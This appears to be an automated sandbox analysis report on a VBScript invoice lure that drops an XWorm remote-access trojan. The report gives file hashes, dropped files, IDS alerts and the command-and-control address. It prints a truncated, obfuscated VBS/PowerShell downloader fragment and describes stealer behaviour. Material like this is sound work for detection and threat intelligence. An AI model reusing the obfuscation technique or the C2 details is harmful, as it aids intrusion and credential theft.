	.04.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	104.21.84.67
	Barotse.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.84.67
	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse	104.21.84.67
	0dN59ZIkEM.exe	Get hash	malicious	Vidar	Browse	104.21.84.67
	T0gjOTzwJb.exe	Get hash	malicious	Djvu	Browse	104.21.84.67
	34cFFMVY3B.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	104.21.84.67

Process:	C:\Windows\System32\wscript.exe
File Type:	Unicode text, UTF-8 text, with very long lines (11128), with CRLF line terminators
Category:	dropped
Size (bytes):	13242
Entropy (8bit):	4.724384698993136
Encrypted:	false
SSDEEP:	384:Kd69/3VaEhGhwldmsBqd+mkQGbmK3jVN4H+qyRqNVpPgR/VNLb8llPQ99:NV14uldvqgbQGKK3jVNX1MViFYllPq
MD5:	87E8A4D11E59E3730BFAB8232093CFDC
SHA1:	937EB12AE1B3E1D623D918072757F607F2542483
SHA-256:	F1FE8804FA415369544C64F479FFBCD976DAE9AED7F88D0E8865C0C1C5964305
SHA-512:	17FD850A44D459ECF201C5AB01FBAF08B5508B6CFC626692E44C66F84360A7DCDD5B4BEDA72DF54B4E05A446BF90B96F63BF7D7F1BF711E79A279660726C66BC
Malicious:	false
Reputation:	low
Preview:	.. dim encavalgar , antecessor , remelgueiro , picardo , morsa , Cama , morsa1.. antecessor = " ".. remelgueiro = "" & picardo & antecessor & picardo & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & picardo & antecessor & picardo & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & picardo & antecessor & picardo & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & picardo & antecessor & picardo & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & picardo & antecessor & picardo & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & picardo & antecessor & picardo & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & picardo & anteces

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9434
Entropy (8bit):	4.9243637703272345
Encrypted:	false
SSDEEP:	192:exoe5lpOdxoe56ib49Vsm5emdagkjDt4iWN3yBGHB9smMdcU6CBdcU6Ch9smPpOU:cVib49Vkjh4iUx4cYKib4o
MD5:	EF4099FCAB6D29945272316889156337
SHA1:	5AAFAD4581D21179B892604BEBD6038792F8CBD6
SHA-256:	A86220AB1F2A5498457C8801DFCBB2FE3EA6977378CE7E3EEBD007336AFDB3BC
SHA-512:	EC9BB5508D39E6C038878F789DE84F7FBDC87CD20AE3EF81D68BC6589784ADB98EDCDEBF544A463C0AB2F01F52B743803A49A4F3A54FD3D003851B7DEEB8014C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulLzc:NllU
MD5:	D0D8DA475C24D98797D589D2BD9D83F9
SHA1:	337DF4C8E968553F7845124876752AB668DC4038
SHA-256:	557DD96F04E44166641933316B033DEC24AC0E5C7567D6DB1814CB821E026C0B
SHA-512:	BE4E5C4551F8FF22349280446B6EBD3E4E6D88820B8F944962825A83259CFE6DD5BB24517C585F31E20EA6B3BD4F60A0ED94FCF89A95F3B881D61C4788C616F0
Malicious:	false
Reputation:	low
Preview:	@...e...................................u............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5z25d1o2.jk3.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4uatg5b.fof.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnu5whkh.i3f.ps1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rctxvwri.4a1.psm1

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\places.raw

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03786218306281921
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
MD5:	4BB4A37B8E93E9B0F5D3DF275799D45E
SHA1:	E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
SHA-256:	89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
SHA-512:	F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1BEA.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1BFB.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1BFC.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	modified
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp31E5.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp31E6.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03786218306281921
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
MD5:	4BB4A37B8E93E9B0F5D3DF275799D45E
SHA1:	E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
SHA-256:	89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
SHA-512:	F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA717.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBC62.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBC72.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBC83.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBC94.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBCA4.tmp.dat

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

**\Device\Mup\user-PC*\MAILSLOT\NET\NETLOGON**

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	3.6311534414266404
Encrypted:	false
SSDEEP:	3:Zp5I2Y1AnK5/lElLn:ZoG5Ln
MD5:	DBC88DDC663AE0083C2FC022EB9928C4
SHA1:	206FBBC8C2A34F5468A29B3FE4CD98B30CFD4AA6
SHA-256:	9C4D4878B3B3D23DF6254B250402FEF1C7892B208EE91E12AC3E8F3070D786AD
SHA-512:	2B40AF5D25FF9AE9C2671CBCD5580A2999E7B3A6908ABDCF7CEF4907BF3AEEBBC79D71137E8BD20612254315116232E90348C89694709BF280B7BFDBAFDBCE05
Malicious:	false
Preview:	....7.1.5.5.7.5.....\MAILSLOT\NET\GETDC3580D48F.................

\Device\Mup\user-PC\PIPE\samr

Process:	C:\Windows\System32\wscript.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	160
Entropy (8bit):	4.438743916256937
Encrypted:	false
SSDEEP:	3:rmHfvtH//STGlA1yqGlYUGk+ldyHGlgZty:rmHcKtGFlqty
MD5:	E467C82627F5E1524FDB4415AF19FC73
SHA1:	B86E3AA40E9FBED0494375A702EABAF1F2E56F8E
SHA-256:	116CD35961A2345CE210751D677600AADA539A66F046811FA70E1093E01F2540
SHA-512:	2A969893CC713D6388FDC768C009055BE1B35301A811A7E313D1AEEC1F75C88CCDDCD8308017A852093B1310811E90B9DA76B6330AACCF5982437D84F553183A
Malicious:	false
Preview:	................................xW4.4.....#Eg.......]..........+.H`........xW4.4.....#Eg......3.qq..7I......6........xW4.4.....#Eg......,..l..@E............

\Device\Mup\user-PC\PIPE\wkssvc

Process:	C:\Windows\System32\wscript.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	160
Entropy (8bit):	4.577654635909331
Encrypted:	false
SSDEEP:	3:rmHfvtH//Sy3yeM1y73yeUUGk+l91F3ye0Zty:rmHcy3HL73HNGFlXF3HIty
MD5:	86EFD27334586B592E7BFBD0E143C450
SHA1:	E8D1FF64BB20235FD4AF6D8051A4CD4A19B91BDE
SHA-256:	4AA9CA41BA628CDB8E337FCD8929F6BD8D68997E120A8C925BFA1C311AD7DFB4
SHA-512:	3FA13E0456C17D061B40F512CD5615F0B46F82E2095F82C0EB4D1D3E8DAF1ECE475028EB77C78C0FF91E034B745F3FD3C1F0C5AE87FBAEB69F67B1C69F547048
Malicious:	false
Preview:	...................................k...6.3F..~4Z.....]..........+.H`...........k...6.3F..~4Z....3.qq..7I......6...........k...6.3F..~4Z....,..l..@E............

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Entropy (8bit):	3.414701892007968
TrID:	Text - UTF-16 (LE) encoded (2002/1) 64.44% MP3 audio (1001/1) 32.22% Lumena CEL bitmap (63/63) 2.03% Corel Photo Paint (41/41) 1.32%
File name:	Factura.PDF______________________________________.vbs
File size:	62'496 bytes
MD5:	fba0a6503bbcc97443b76779d76b59f2
SHA1:	f245b42ec28054e778a3d623b9e4e5d5b1143723
SHA256:	e914d7b2b0502bb6ce4ec2f0da842aac779db5f146a5e3e8e92b6193084a59c4
SHA512:	2af26c86d9b5e2a8abffe6cb1e4578c66a60f0b0799040efaac9fe952a546380d8f7bc66404acffeb3364cc484d8cf00714bf299650907a927408f9982e58bd6
SSDEEP:	384:FZAaML08RzGAhnpMyXRIRpu4kJ6jM1L7Kc0ZaEXJg:7xGiyXRIRg4kJq9ZpZg
TLSH:	87536A526BEB2108B5FBBA48997A41344F3779C5AD7DC94E05CC291D0BF3E848C60BA7
File Content Preview:	..'.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....'.....'. .C.o.p.y.r.i.g.h.t. .(.c.). .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n... .A.l.l. .r.i.g.h.t.s. .r

File Icon


Icon Hash:	68d69b8f86ab9a86

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/30/24-07:59:49.664897	TCP	2020424	ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1	443	49710	66.90.95.11	192.168.2.7
04/30/24-08:01:18.403331	TCP	2852874	ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2	3344	49711	91.92.242.85	192.168.2.7
04/30/24-08:00:08.299467	TCP	2855924	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49711	3344	192.168.2.7	91.92.242.85
04/30/24-08:01:26.806815	TCP	2852923	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	49711	3344	192.168.2.7	91.92.242.85
04/30/24-07:59:59.003102	TCP	2852873	ETPRO TROJAN Win32/XWorm CnC PING Command Outbound M2	49712	3344	192.168.2.7	91.92.242.85
04/30/24-07:59:38.240188	TCP	2049038	ET TROJAN Malicious Base64 Encoded Payload In Image	443	49709	104.21.45.138	192.168.2.7
04/30/24-08:01:26.805516	TCP	2852870	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes	3344	49711	91.92.242.85	192.168.2.7
04/30/24-07:59:37.898972	TCP	2047750	ET TROJAN Base64 Encoded MZ In Image	443	49709	104.21.45.138	192.168.2.7
04/30/24-07:59:38.210451	TCP	2025011	ET TROJAN Powershell commands sent B64 2	443	49709	104.21.45.138	192.168.2.7
04/30/24-07:59:58.587341	TCP	2853191	ETPRO TROJAN Win32/XWorm V3 CnC Command - savePlugin Inbound	3344	49711	91.92.242.85	192.168.2.7
04/30/24-07:59:37.898972	TCP	2018856	ET TROJAN Windows executable base64 encoded	443	49709	104.21.45.138	192.168.2.7
04/30/24-07:59:54.977871	TCP	2853192	ETPRO TROJAN Win32/XWorm V3 CnC Command - sendPlugin Outbound	49711	3344	192.168.2.7	91.92.242.85
04/30/24-07:59:59.003102	TCP	2852923	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	49712	3344	192.168.2.7	91.92.242.85

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 30, 2024 07:59:08.265152931 CEST	49674	443	192.168.2.7	104.98.116.138
Apr 30, 2024 07:59:08.265160084 CEST	49675	443	192.168.2.7	104.98.116.138
Apr 30, 2024 07:59:08.405682087 CEST	49672	443	192.168.2.7	104.98.116.138
Apr 30, 2024 07:59:08.859184980 CEST	49671	443	192.168.2.7	204.79.197.203
Apr 30, 2024 07:59:09.171288013 CEST	49671	443	192.168.2.7	204.79.197.203
Apr 30, 2024 07:59:09.780709028 CEST	49671	443	192.168.2.7	204.79.197.203
Apr 30, 2024 07:59:10.983874083 CEST	49671	443	192.168.2.7	204.79.197.203
